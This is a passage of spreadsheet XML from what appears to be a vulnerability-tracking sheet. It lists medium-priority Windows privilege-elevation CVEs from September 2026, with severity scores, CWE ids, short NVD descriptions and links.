(VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T960" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t></is></c></row><row r="961"><c r="A961" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B961" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C961" s="5" t="inlineStr"><is><t>CVE-2026-69613</t></is></c><c r="D961" s="5" t="n"><v>7</v></c><c r="E961" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F961" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G961" s="5" t="inlineStr" /><c r="H961" s="5" t="n"><v>0.003</v></c><c r="I961" s="5" t="inlineStr" /><c r="J961" s="5" t="inlineStr" /><c r="K961" s="5" t="inlineStr" /><c r="L961" s="5" t="inlineStr" /><c r="M961" s="5" t="inlineStr" /><c r="N961" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O961" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P961" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q961" s="5" t="inlineStr" /><c r="R961" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S961" s="5" t="inlineStr"><is><t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T961" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t></is></c></row><row r="962"><c r="A962" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B962" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C962" s="5" t="inlineStr"><is><t>CVE-2026-69617</t></is></c><c r="D962" s="5" t="n"><v>7</v></c><c r="E962" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F962" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G962" s="5" t="inlineStr" /><c r="H962" s="5" t="n"><v>0.003</v></c><c r="I962" s="5" t="inlineStr" /><c r="J962" s="5" t="inlineStr" /><c r="K962" s="5" t="inlineStr" /><c r="L962" s="5" t="inlineStr" /><c r="M962" s="5" t="inlineStr" /><c r="N962" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O962" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P962" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q962" s="5" t="inlineStr" /><c r="R962" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S962" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T962" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t></is></c></row><row r="963"><c r="A963" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B963" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C963" s="5" t="inlineStr"><is><t>CVE-2026-69621</t></is></c><c r="D963" s="5" t="n"><v>7</v></c><c r="E963" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F963" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G963" s="5" t="inlineStr" /><c r="H963" s="5" t="n"><v>0.003</v></c><c r="I963" s="5" t="inlineStr" /><c r="J963" s="5" t="inlineStr" /><c r="K963" s="5" t="inlineStr" /><c r="L963" s="5" t="inlineStr" /><c r="M963" s="5" t="inlineStr" /><c r="N963" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O963" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P963" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q963" s="5" t="inlineStr" /><c r="R963" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S963" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T963" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t></is></c></row><row r="964"><c r="A964" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B964" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C964" s="5" t="inlineStr"><is><t>CVE-2026-69630</t></is></c><c r="D964" s="5" t="n"><v>7</v></c><c r="E964" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F964" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G964" s="5" t="inlineStr" /><c r="H964" s="5" t="n"><v>0.003</v></c><c r="I964" s="5" t="inlineStr" /><c r="J964" s="5" t="inlineStr" /><c r="K964" s="5" t="inlineStr" /><c r="L964" s="5" t="inlineStr" /><c r="M964" s="5" t="inlineStr" /><c r="N964" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O964" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P964" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q964" s="5" t="inlineStr" /><c r="R964" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S964" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T964" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t></is></c></row><row r="965"><c r="A965" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B965" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C965" s="5" t="inlineStr"><is><t>CVE-2026-69645</t></is></c><c r="D965" s="5" t="n"><v>7</v></c><c r="E965" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F965" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G965" s="5" t="inlineStr" /><c r="H965" s="5" t="n"><v>0.003</v></c><c r="I965" s="5" t="inlineStr" /><c r="J965" s="5" t="inlineStr" /><c r="K965" s="5" t="inlineStr" /><c r="L965" s="5" t="inlineStr" /><c r="M965" s="5" t="inlineStr" /><c r="N965" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O965" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P965" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q965" s="5" t="inlineStr" /><c r="R965" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S965" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T965" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t></is></c></row><row r="966"><c r="A966" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B966" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C966" s="5" t="inlineStr"><is><t>CVE-2026-69648</t></is></c><c r="D966" s="5" t="n"><v>7</v></c><c r="E966" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F966" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G966" s="5" t="inlineStr" /><c r="H966" s="5" t="n"><v>0.003</v></c><c r="I966" s="5" t="inlineStr" /><c r="J966" s="5" t="inlineStr" /><c r="K966" s="5" t="inlineStr" /><c r="L966" s="5" t="inlineStr" /><c r="M966" s="5" t="inlineStr" /><c r="N966" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O966" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P966" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q966" s="5" t="inlineStr" /><c r="R966" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S966" s="5" t="inlineStr"><is><t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T966" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t></is></c></row><row r="967"><c r="A967" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B967" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C967" s="5" t="inlineStr"><is><t>CVE-2026-69652</t></is></c><c r="D967" s="5" t="n"><v>7</v></c><c r="E967" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F967" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G967" s="5" t="inlineStr" /><c r="H967" s="5" t="n"><v>0.003</v></c><c r="I967" s="5" t="inlineStr" /><c r="J967" s="5" t="inlineStr" /><c r="K967" s="5" t="inlineStr" /><c r="L967" s="5" t="inlineStr" /><c r="M967" s="5" t="inlineStr" /><c r="N967" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O967" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P967" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q967" s="5" t="inlineStr" /><c r="R967" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S967" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T967" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t></is></c></row><row r="968"><c r="A968" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B968" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C968" s="5" t="inlineStr"><is><t>CVE-2026-69654</t></is></c><c r="D968" s="5" t="n"><v>7</v></c><c r="E968" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F968" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G968" s="5" t="inlineStr" /><c r="H968" s="5" t="n"><v>0.003</v></c><c r="I968" s="5" t="inlineStr" /><c r="J968" s="5" t="inlineStr" /><c r="K968" s="5" t="inlineStr" /><c r="L968" s="5" t="inlineStr" /><c r="M968" s="5" t="inlineStr" /><c r="N968" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O968" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P968" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q968" s="5" t="inlineStr" /><c r="R968" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S968" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T968" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t></is></c></row><row r="969"><c r="A969" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B969" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C969" s="5" t="inlineStr"><is><t>CVE-2026-69682</t></is></c><c r="D969" s="5" t="n"><v>7</v></c><c r="E969" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F969" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G969" s="5" t="inlineStr" /><c r="H969" s="5" t="n"><v>0.002</v></c><c r="I969" s="5" t="inlineStr" /><c r="J969" s="5" t="inlineStr" /><c r="K969" s="5" t="inlineStr" /><c r="L969" s="5" t="inlineStr" /><c r="M969" s="5" t="inlineStr" /><c r="N969" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O969" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P969" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q969" s="5" t="inlineStr" /><c r="R969" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S969" s="5" t="inlineStr"><is><t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T969" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t></is></c></row><row r="970"><c r="A970" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B970" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C970" s="5" t="inlineStr"><is><t>CVE-2026-69692</t></is></c><c r="D970" s="5" t="n"><v>7</v></c><c r="E970" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F970" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G970" s="5" t="inlineStr" /><c r="H970" s="5" t="n"><v>0.003</v></c><c r="I970" s="5" t="inlineStr" /><c r="J970" s="5" t="inlineStr" /><c r="K970" s="5" t="inlineStr" /><c r="L970" s="5" t="inlineStr" /><c r="M970" s="5" t="inlineStr" /><c r="N970" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O970" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P970" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q970" s="5" t="inlineStr" /><c r="R970" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S970" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T970" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t></is></c></row><row r="971"><c r="A971" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B971" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C971" s="5" t="inlineStr"><is><t>CVE-2026-69693</t></is></c><c r="D971" s="5" t="n"><v>7</v></c><c r="E971" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F971" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G971" s="5" t="inlineStr" /><c r="H971" s="5" t="n"><v>0.003</v></c><c r="I971" s="5" t="inlineStr" /><c r="J971" s="5" t="inlineStr" /><c r="K971" s="5" t="inlineStr" /><c r="L971" s="5" t="inlineStr" /><c r="M971" s="5" t="inlineStr" /><c r="N971" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O971" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P971" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q971" s="5" t="inlineStr" /><c r="R971" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S971" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T971" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t></is></c></row><row r="972"><c r="A972" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B972" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C972" s="5" t="inlineStr"><is><t>CVE-2026-69694</t></is></c><c r="D972" s="5" t="n"><v>7</v></c><c r="E972" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F972" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G972" s="5" t="inlineStr" /><c r="H972" s="5" t="n"><v>0.017</v></c><c r="I972" s="5" t="inlineStr" /><c r="J972" s="5" t="inlineStr" /><c r="K972" s="5" t="inlineStr" /><c r="L972" s="5" t="inlineStr" /><c r="M972" s="5" t="inlineStr" /><c r="N972" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O972" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P972" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q972" s="5" t="inlineStr" /><c r="R972" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S972" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T972" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t></is></c></row><row r="973"><c r="A973" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B973" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C973" s="5" t="inlineStr"><is><t>CVE-2026-69708</t></is></c><c r="D973" s="5" t="n"><v>7</v></c><c r="E973" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F973" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G973" s="5" t="inlineStr" /><c r="H973" s="5" t="n"><v>0.003</v></c><c r="I973" s="5" t="inlineStr" /><c r="J973" s="5" t="inlineStr" /><c r="K973" s="5" t="inlineStr" /><c r="L973" s="5" t="inlineStr" /><c r="M973" s="5" t="inlineStr" /><c r="N973" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O973" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P973" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q973" s="5" t="inlineStr" /><c r="R973" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S973" s="5" t="inlineStr"><is><t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T973" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t></is></c></row><row r="974"><c r="A974" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B974" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C974" s="5" t="inlineStr"><is><t>CVE-2026-69711</t></is></c><c r="D974" s="5" t="n"><v>7</v></c><c r="E974" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F974" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G974" s="5" t="inlineStr" /><c r="H974" s="5" t="n"><v>0.003</v></c><c r="I974" s="5" t="inlineStr" /><c r="J974" s="5" t="inlineStr" /><c r="K974" s="5" t="inlineStr" /><c r="L974" s="5" t="inlineStr" /><c r="M974" s="5" t="inlineStr" /><c r="N974" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O974" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P974" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q974" s="5" t="inlineStr" /><c r="R974" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S974" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T974" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t></is></c></row><row r="975"><c r="A975" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B975" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C975" s="5" t="inlineStr"><is><t>CVE-2026-69735</t></is></c><c r="D975" s="5" t="n"><v>7</v></c><c r="E975" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F975" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G975" s="5" t="inlineStr" /><c r="H975" s="5" t="n"><v>0.003</v></c><c r="I975" s="5" t="inlineStr" /><c r="J975" s="5" t="inlineStr" /><c r="K975" s="5" t="inlineStr" /><c r="L975" s="5" t="inlineStr" /><c r="M975" s="5" t="inlineStr" /><c r="N975" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O975" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P975" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q975" s="5" t="inlineStr" /><c r="R975" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S975" s="5" t="inlineStr"><is><t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T975" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t></is></c></row><row r="976"><c r="A976" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B976" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C976" s="5" t="inlineStr"><is><t>CVE-2026-69779</t></is></c><c r="D976" s="5" t="n"><v>7</v></c><c r="E976" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F976" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G976" s="5" t="inlineStr" /><c r="H976" s="5" t="n"><v>0.002</v></c><c r="I976" s="5" t="inlineStr" /><c r="J976" s="5" t="inlineStr" /><c r="K976" s="5" t="inlineStr" /><c r="L976" s="5" t="inlineStr" /><c r="M976" s="5" t="inlineStr" /><c r="N976" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O976" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P976" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q976" s="5" t="inlineStr" /><c r="R976" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S976" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T976" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t></is></c></row><row r="977"><c r="A977" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B977" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C977" s="5" t="inlineStr"><is><t>CVE-2026-69791</t></is></c><c r="D977" s="5" t="n"><v>7</v></c><c r="E977" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F977" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G977" s="5" t="inlineStr" /><c r="H977" s="5" t="n"><v>0.003</v></c><c r="I977" s="5" t="inlineStr" /><c r="J977" s="5" t="inlineStr" /><c r="K977" s="5" t="inlineStr" /><c r="L977" s="5" t="inlineStr" /><c r="M977" s="5" t="inlineStr" /><c r="N977" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O977" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P977" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q977" s="5" t="inlineStr" /><c r="R977" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S977" s="5" t="inlineStr"><is><t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T977" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t></is></c></row><row r="978"><c r="A978" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B978" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C978" s="5" t="inlineStr"><is><t>CVE-2026-69806</t></is></c><c r="D978" s="5" t="n"><v>7</v></c><c r="E978" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F978" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G978" s="5" t="inlineStr" /><c r="H978" s="5" t="n"><v>0.018</v></c><c r="I978" s="5" t="inlineStr" /><c r="J978" s="5" t="inlineStr" /><c r="K978" s="5" t="inlineStr" /><c r="L978" s="5" t="inlineStr" /><c r="M978" s="5" t="inlineStr" /><c r="N978" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O978" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P978" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q978" s="5" t="inlineStr" /><c r="R978" s="5" t="inlineStr"><is><t>CWE-200, CWE-94</t></is></c><c r="S978" s="5" t="inlineStr"><is><t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T978" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t></is></c></row><row r="979"><c r="A979" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B979" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C979" s="5" t="inlineStr"><is><t>CVE-2026-69814</t></is></c><c r="D979" s="5" t="n"><v>7</v></c><c r="E979" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F979" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G979" s="5" t="inlineStr" /><c r="H979" s="5" t="n"><v>0.003</v></c><c r="I979" s="5" t="inlineStr" /><c r="J979" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K979" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L979" s="5" t="inlineStr" /><c r="M979" s="5" t="inlineStr" /><c r="N979" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O979" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P979" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q979" s="5" t="inlineStr" /><c r="R979" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S979" s="5" t="inlineStr"><is><t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T979" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t></is></c></row><row r="980"><c r="A980" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B980" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C980" s="5" t="inlineStr"><is><t>CVE-2026-69816</t></is></c><c r="D980" s="5" t="n"><v>7</v></c><c r="E980" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F980" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G980" s="5" t="inlineStr" /><c r="H980" s="5" t="n"><v>0.003</v></c><c r="I980" s="5" t="inlineStr" /><c r="J980" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K98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80" s="5" t="inlineStr" /><c r="M980" s="5" t="inlineStr" /><c r="N980" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O980" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P980" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q980" s="5" t="inlineStr" /><c r="R980" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S980" s="5" t="inlineStr"><is><t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T980" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t></is></c></row><row r="981"><c r="A981" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B981" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C981" s="5" t="inlineStr"><is><t>CVE-2026-69817</t></is></c><c r="D981" s="5" t="n"><v>7</v></c><c r="E981" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F981" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G981" s="5" t="inlineStr" /><c r="H981" s="5" t="n"><v>0.003</v></c><c r="I981" s="5" t="inlineStr" /><c r="J981" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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1" s="5" t="inlineStr" /><c r="M981" s="5" t="inlineStr" /><c r="N981" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O981" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P981" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q981" s="5" t="inlineStr" /><c r="R981" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S981" s="5" t="inlineStr"><is><t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T981" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t></is></c></row><row r="982"><c r="A982" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B982" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C982" s="5" t="inlineStr"><is><t>CVE-2026-69818</t></is></c><c r="D982" s="5" t="n"><v>7</v></c><c r="E982" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F982" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G982" s="5" t="inlineStr" /><c r="H982" s="5" t="n"><v>0.003</v></c><c r="I982" s="5" t="inlineStr" /><c r="J982" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K982" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L982" s="5" t="inlineStr" /><c r="M982" s="5" t="inlineStr" /><c r="N982" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O982" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P982" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q982" s="5" t="inlineStr" /><c r="R982" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S982" s="5" t="inlineStr"><is><t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T982" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t></is></c></row><row r="983"><c r="A983" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B983" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C983" s="5" t="inlineStr"><is><t>CVE-2026-69834</t></is></c><c r="D983" s="5" t="n"><v>7</v></c><c r="E983" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F983" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G983" s="5" t="inlineStr" /><c r="H983" s="5" t="n"><v>0.003</v></c><c r="I983" s="5" t="inlineStr" /><c r="J983" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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3" s="5" t="inlineStr" /><c r="M983" s="5" t="inlineStr" /><c r="N983" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O983" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P983" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q983" s="5" t="inlineStr" /><c r="R983" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S983" s="5" t="inlineStr"><is><t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T983" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t></is></c></row><row r="984"><c 